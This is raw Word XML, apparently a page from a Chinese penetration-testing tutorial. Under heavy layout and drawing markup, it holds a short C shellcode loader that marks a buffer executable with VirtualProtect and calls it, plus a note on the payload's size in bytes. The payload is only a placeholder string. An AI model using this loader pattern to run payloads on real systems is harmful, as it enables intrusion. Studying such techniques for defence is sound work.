        <v:shape style="position:absolute;left:2550;top:11210;width:130;height:270" coordorigin="2550,11210" coordsize="130,270" path="m2575,11235l2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2577,11235,2577,11235,2577,11235,2577,11235,2577,11235,2577,11235,2578,11235,2578,11235,2578,11235,2578,11235,2579,11235,2579,11235,2579,11235,2580,11235,2580,11235,2580,11235,2581,11235,2581,11235,2581,11235,2582,11235,2582,11235,2583,11235,2583,11235,2584,11235,2584,11235,2585,11235,2585,11235,2586,11235,2587,11235,2587,11235,2588,11235,2588,11235,2589,11235,2590,11235,2591,11235,2591,11235,2592,11235,2593,11235,2594,11235,2595,11235,2596,11235,2597,11235,2598,11235,2599,11235,2600,11235,2601,11235,2602,11235,2603,11235,2604,11235,2605,11235,2607,11235,2608,11235,2609,11235,2610,11235,2612,11235,2613,11235,2615,11235,2616,11235,2618,11235,2619,11235,2621,11235,2622,11235,2624,11235,2626,11235,2627,11235,2629,11235,2631,11235,2633,11235,2634,11235,2636,11235,2638,11235,2640,11235,2642,11235,2644,11235,2647,11235,2649,11235,2651,11235,2653,11235,2655,11235,2658,11235,2660,11235,2663,11235,2665,11235,2668,11235,2670,11235,2673,11235,2675,11235,2678,11235,2681,11235,2684,11235,2687,11235,2689,11235,2692,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11236,2695,11236,2695,11236,2695,11236,2695,11236,2695,11237,2695,11237,2695,11237,2695,11237,2695,11238,2695,11238,2695,11238,2695,11239,2695,11239,2695,11240,2695,11240,2695,11241,2695,11241,2695,11242,2695,11242,2695,11243,2695,11244,2695,11244,2695,11245,2695,11246,2695,11247,2695,11248,2695,11248,2695,11249,2695,11250,2695,11251,2695,11252,2695,11254,2695,11255,2695,11256,2695,11257,2695,11258,2695,11260,2695,11261,2695,11263,2695,11264,2695,11266,2695,11267,2695,11269,2695,11271,2695,11273,2695,11274,2695,11276,2695,11278,2695,11280,2695,11282,2695,11284,2695,11287,2695,11289,2695,11291,2695,11294,2695,11296,2695,11299,2695,11301,2695,11304,2695,11307,2695,11309,2695,11312,2695,11315,2695,11318,2695,11321,2695,11324,2695,11328,2695,11331,2695,11334,2695,11338,2695,11341,2695,11345,2695,11349,2695,11353,2695,11356,2695,11360,2695,11364,2695,11369,2695,11373,2695,11377,2695,11382,2695,11386,2695,11391,2695,11395,2695,11400,2695,11405,2695,11410,2695,11415,2695,11420,2695,11425,2695,11431,2695,11436,2695,11442,2695,11447,2695,11453,2695,11459,2695,11465,2695,11471,2695,11477,2695,11483,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2694,11490,2694,11490,2694,11490,2694,11490,2694,11490,2694,11490,2694,11490,2693,11490,2693,11490,2693,11490,2693,11490,2693,11490,2692,11490,2692,11490,2692,11490,2691,11490,2691,11490,2691,11490,2690,11490,2690,11490,2690,11490,2689,11490,2689,11490,2688,11490,2688,11490,2687,11490,2687,11490,2686,11490,2686,11490,2685,11490,2685,11490,2684,11490,2684,11490,2683,11490,2682,11490,2681,11490,2681,11490,2680,11490,2679,11490,2678,11490,2678,11490,2677,11490,2676,11490,2675,11490,2674,11490,2673,11490,2672,11490,2671,11490,2670,11490,2669,11490,2668,11490,2666,11490,2665,11490,2664,11490,2663,11490,2662,11490,2660,11490,2659,11490,2657,11490,2656,11490,2655,11490,2653,11490,2652,11490,2650,11490,2648,11490,2647,11490,2645,11490,2643,11490,2642,11490,2640,11490,2638,11490,2636,11490,2634,11490,2632,11490,2630,11490,2628,11490,2626,11490,2624,11490,2622,11490,2620,11490,2618,11490,2615,11490,2613,11490,2611,11490,2608,11490,2606,11490,2603,11490,2601,11490,2598,11490,2595,11490,2593,11490,2590,11490,2587,11490,2584,11490,2581,11490,2578,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11488,2575,11488,2575,11488,2575,11488,2575,11487,2575,11487,2575,11487,2575,11486,2575,11486,2575,11486,2575,11485,2575,11485,2575,11484,2575,11484,2575,11483,2575,11483,2575,11482,2575,11481,2575,11481,2575,11480,2575,11479,2575,11479,2575,11478,2575,11477,2575,11476,2575,11475,2575,11474,2575,11473,2575,11472,2575,11471,2575,11470,2575,11469,2575,11467,2575,11466,2575,11465,2575,11463,2575,11462,2575,11460,2575,11459,2575,11457,2575,11455,2575,11454,2575,11452,2575,11450,2575,11448,2575,11446,2575,11444,2575,11442,2575,11440,2575,11438,2575,11436,2575,11433,2575,11431,2575,11428,2575,11426,2575,11423,2575,11421,2575,11418,2575,11415,2575,11412,2575,11409,2575,11406,2575,11403,2575,11400,2575,11397,2575,11393,2575,11390,2575,11387,2575,11383,2575,11379,2575,11376,2575,11372,2575,11368,2575,11364,2575,11360,2575,11356,2575,11352,2575,11347,2575,11343,2575,11338,2575,11334,2575,11329,2575,11324,2575,11319,2575,11315,2575,11309,2575,11304,2575,11299,2575,11294,2575,11288,2575,11283,2575,11277,2575,11271,2575,11265,2575,11260,2575,11253,2575,11247,2575,11241,2575,11235e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:616.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,12330" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:12330;width:130;height:270" coordorigin="3010,12330" coordsize="130,270" path="m3026,12345l3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3027,12345,3027,12345,3027,12345,3027,12345,3027,12345,3027,12345,3027,12345,3028,12345,3028,12345,3028,12345,3028,12345,3029,12345,3029,12345,3029,12345,3029,12345,3030,12345,3030,12345,3030,12345,3031,12345,3031,12345,3032,12345,3032,12345,3032,12345,3033,12345,3033,12345,3034,12345,3034,12345,3035,12345,3036,12345,3036,12345,3037,12345,3037,12345,3038,12345,3039,12345,3039,12345,3040,12345,3041,12345,3042,12345,3043,12345,3043,12345,3044,12345,3045,12345,3046,12345,3047,12345,3048,12345,3049,12345,3050,12345,3051,12345,3052,12345,3053,12345,3054,12345,3056,12345,3057,12345,3058,12345,3059,12345,3061,12345,3062,12345,3063,12345,3065,12345,3066,12345,3068,12345,3069,12345,3071,12345,3072,12345,3074,12345,3076,12345,3077,12345,3079,12345,3081,12345,3083,12345,3085,12345,3087,12345,3089,12345,3091,12345,3093,12345,3095,12345,3097,12345,3099,12345,3101,12345,3103,12345,3106,12345,3108,12345,3110,12345,3113,12345,3115,12345,3118,12345,3120,12345,3123,12345,3126,12345,3128,12345,3131,12345,3134,12345,3137,12345,3140,12345,3143,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12347,3146,12347,3146,12347,3146,12347,3146,12348,3146,12348,3146,12348,3146,12349,3146,12349,3146,12349,3146,12350,3146,12350,3146,12351,3146,12351,3146,12352,3146,12352,3146,12353,3146,12354,3146,12354,3146,12355,3146,12356,3146,12356,3146,12357,3146,12358,3146,12359,3146,12360,3146,12361,3146,12362,3146,12363,3146,12364,3146,12365,3146,12367,3146,12368,3146,12369,3146,12370,3146,12372,3146,12373,3146,12375,3146,12376,3146,12378,3146,12380,3146,12381,3146,12383,3146,12385,3146,12387,3146,12389,3146,12391,3146,12393,3146,12395,3146,12397,3146,12399,3146,12402,3146,12404,3146,12407,3146,12409,3146,12412,3146,12414,3146,12417,3146,12420,3146,12423,3146,12426,3146,12429,3146,12432,3146,12435,3146,12438,3146,12442,3146,12445,3146,12448,3146,12452,3146,12456,3146,12459,3146,12463,3146,12467,3146,12471,3146,12475,3146,12479,3146,12483,3146,12488,3146,12492,3146,12497,3146,12501,3146,12506,3146,12511,3146,12516,3146,12520,3146,12526,3146,12531,3146,12536,3146,12541,3146,12547,3146,12552,3146,12558,3146,12564,3146,12570,3146,12575,3146,12582,3146,12588,3146,12594,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3144,12600,3144,12600,3144,12600,3144,12600,3144,12600,3144,12600,3143,12600,3143,12600,3143,12600,3143,12600,3143,12600,3142,12600,3142,12600,3142,12600,3141,12600,3141,12600,3141,12600,3140,12600,3140,12600,3140,12600,3139,12600,3139,12600,3138,12600,3138,12600,3137,12600,3137,12600,3136,12600,3136,12600,3135,12600,3134,12600,3134,12600,3133,12600,3132,12600,3132,12600,3131,12600,3130,12600,3129,12600,3129,12600,3128,12600,3127,12600,3126,12600,3125,12600,3124,12600,3123,12600,3122,12600,3121,12600,3120,12600,3119,12600,3118,12600,3117,12600,3116,12600,3114,12600,3113,12600,3112,12600,3110,12600,3109,12600,3108,12600,3106,12600,3105,12600,3103,12600,3102,12600,3100,12600,3099,12600,3097,12600,3095,12600,3094,12600,3092,12600,3090,12600,3088,12600,3086,12600,3084,12600,3083,12600,3081,12600,3079,12600,3076,12600,3074,12600,3072,12600,3070,12600,3068,12600,3065,12600,3063,12600,3061,12600,3058,12600,3056,12600,3053,12600,3051,12600,3048,12600,3045,12600,3043,12600,3040,12600,3037,12600,3034,12600,3031,12600,3029,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12599,3026,12599,3026,12599,3026,12599,3026,12599,3026,12599,3026,12598,3026,12598,3026,12598,3026,12597,3026,12597,3026,12597,3026,12596,3026,12596,3026,12595,3026,12595,3026,12594,3026,12594,3026,12593,3026,12593,3026,12592,3026,12591,3026,12591,3026,12590,3026,12589,3026,12588,3026,12587,3026,12587,3026,12586,3026,12585,3026,12584,3026,12583,3026,12581,3026,12580,3026,12579,3026,12578,3026,12577,3026,12575,3026,12574,3026,12572,3026,12571,3026,12569,3026,12568,3026,12566,3026,12564,3026,12562,3026,12561,3026,12559,3026,12557,3026,12555,3026,12553,3026,12551,3026,12548,3026,12546,3026,12544,3026,12541,3026,12539,3026,12536,3026,12534,3026,12531,3026,12529,3026,12526,3026,12523,3026,12520,3026,12517,3026,12514,3026,12511,3026,12507,3026,12504,3026,12501,3026,12497,3026,12494,3026,12490,3026,12486,3026,12482,3026,12479,3026,12475,3026,12471,3026,12466,3026,12462,3026,12458,3026,12453,3026,12449,3026,12444,3026,12440,3026,12435,3026,12430,3026,12425,3026,12420,3026,12415,3026,12410,3026,12404,3026,12399,3026,12393,3026,12388,3026,12382,3026,12376,3026,12370,3026,12364,3026,12358,3026,12352,3026,12345e x" fillcolor="#fefefe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67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源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>include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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;windows.h&gt;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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="407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4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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>char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*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shellcode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96c38"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>char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)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"Micropoor_shellcode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>  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DWORD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Micropoor_shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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7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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BOOL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ret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=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VirtualProtect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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shellcode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strlen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shellcode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8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PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22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&amp;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Micropoor_shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="20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;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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="17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{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10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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return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EXIT_FAILURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9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}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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>   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(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void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(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void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)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shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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(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;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13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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return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EXIT_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="315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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>原始shellc</w:t>
      </w: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ode_payload大小如下：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757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76字节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265.800pt;height:144.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:262.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,5250" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:5250;width:110;height:110" coordorigin="1790,5250" coordsize="110,110" path="m1900,5322l1900,5322,1900,5322,1900,5323,1900,5324,1900,5325,1900,5325,1900,5326,1900,5327,1900,5328,1900,5328,1900,5329,1900,5330,1899,5330,1899,5331,1899,5332,1899,5332,1899,5333,1899,5334,1899,5334,1899,5335,1899,5336,1899,5336,1898,5337,1898,5337,1898,5338,1898,5339,1898,5339,1898,5340,1897,5340,1897,5341,1897,5342,1897,5342,1897,5343,1896,5343,1896,5344,1896,5344,1896,5345,1896,5345,1895,5346,1895,5346,1895,5347,1895,5347,1894,5348,1894,5348,1894,5349,1894,5349,1893,5350,1893,5350,1893,5351,1892,5351,1892,5352,1892,5352,1891,5352,1891,5353,1891,5353,1890,5354,1890,5354,1890,5354,1889,5355,1889,5355,1889,5356,1888,5356,1888,5356,1887,5357,1887,5357,1887,5357,1886,5358,1886,5358,1885,5358,1885,5359,1884,5359,1884,5359,1883,5360,1883,5360,1883,5360,1882,5361,1882,5361,1881,5361,1881,5361,1880,5362,1880,5362,1879,5362,1879,5362,1878,5363,1878,5363,1877,5363,1876,5363,1876,5363,1875,5364,1875,5364,1874,5364,1874,5364,1873,5364,1872,5365,1872,5365,1871,5365,1871,5365,1870,5365,1869,5365,1869,5365,1868,5366,1868,5366,1867,5366,1866,5366,1866,5366,1865,5366,1864,5366,1864,5366,1863,5366,1862,5366,1861,5366,1861,5366,1860,5367,1859,5367,1859,5367,1858,5367,1857,5367,1856,5367,1856,5367,1855,5367,1855,5367,1854,5367,1853,5367,1853,5367,1852,5367,1851,5367,1851,5367,1850,5367,1849,5366,1848,5366,1848,5366,1847,5366,1846,5366,1846,5366,1845,5366,1844,5366,1844,5366,1843,5366,1842,5366,1842,5366,1841,5365,1840,5365,1840,5365,1839,5365,1839,5365,1838,5365,1837,5365,1837,5364,1836,5364,1836,5364,1835,5364,1835,5364,1834,5363,1833,5363,1833,5363,1832,5363,1832,5363,1831,5362,1831,5362,1830,5362,1830,5362,1829,5361,1829,5361,1828,5361,1828,5361,1827,5360,1827,5360,1826,5360,1826,5359,1825,5359,1825,5359,1825,5358,1824,5358,1824,5358,1823,5357,1823,5357,1823,5357,1822,5356,1822,5356,1821,5356,1821,5355,1821,5355,1820,5354,1820,5354,1820,5354,1819,5353,1819,5353,1819,5352,1818,5352,1818,5352,1818,5351,1817,5351,1817,5350,1817,5350,1816,5349,1816,5349,1816,5348,1816,5348,1815,5347,1815,5347,1815,5346,1815,5346,1814,5345,1814,5345,1814,5344,1814,5344,1813,5343,1813,5343,1813,5342,1813,5342,1813,5341,1812,5340,1812,5340,1812,5339,1812,5339,1812,5338,1812,5337,1811,5337,1811,5336,1811,5336,1811,5335,1811,5334,1811,5334,1811,5333,1811,5332,1811,5332,1810,5331,1810,5330,1810,5330,1810,5329,1810,5328,1810,5328,1810,5327,1810,5326,1810,5325,1810,5325,1810,5324,1810,5323,1810,5322,1810,5322,1810,5322,1810,5321,1810,5320,1810,5319,1810,5319,1810,5318,1810,5317,1810,5317,1810,5316,1810,5315,1810,5314,1810,5314,1810,5313,1810,5312,1811,5312,1811,5311,1811,5310,1811,5310,1811,5309,1811,5308,1811,5308,1811,5307,1811,5307,1812,5306,1812,5305,1812,5305,1812,5304,1812,5304,1812,5303,1813,5302,1813,5302,1813,5301,1813,5301,1813,5300,1814,5300,1814,5299,1814,5299,1814,5298,1815,5298,1815,5297,1815,5296,1815,5296,1816,5296,1816,5295,1816,5295,1816,5294,1817,5294,1817,5293,1817,5293,1818,5292,1818,5292,1818,5291,1819,5291,1819,5291,1819,5290,1820,5290,1820,5289,1820,5289,1821,5288,1821,5288,1821,5288,1822,5287,1822,5287,1823,5287,1823,5286,1823,5286,1824,5286,1824,5285,1825,5285,1825,5285,1825,5284,1826,5284,1826,5284,1827,5283,1827,5283,1828,5283,1828,5283,1829,5282,1829,5282,1830,5282,1830,5281,1831,5281,1831,5281,1832,5281,1832,5281,1833,5280,1833,5280,1834,5280,1835,5280,1835,5280,1836,5279,1836,5279,1837,5279,1837,5279,1838,5279,1839,5278,1839,5278,1840,5278,1840,5278,1841,5278,1842,5278,1842,5278,1843,5278,1844,5277,1844,5277,1845,5277,1846,5277,1846,5277,1847,5277,1848,5277,1848,5277,1849,5277,1850,5277,1851,5277,1851,5277,1852,5277,1853,5277,1853,5277,1854,5277,1855,5277,1855,5277,1856,5277,1856,5277,1857,5277,1858,5277,1859,5277,1859,5277,1860,5277,1861,5277,1861,5277,1862,5277,1863,5277,1864,5277,1864,5277,1865,5277,1866,5277,1866,5277,1867,5278,1868,5278,1868,5278,1869,5278,1869,5278,1870,5278,1871,5278,1871,5278,1872,5279,1872,5279,1873,5279,1874,5279,1874,5279,1875,5280,1875,5280,1876,5280,1876,5280,1877,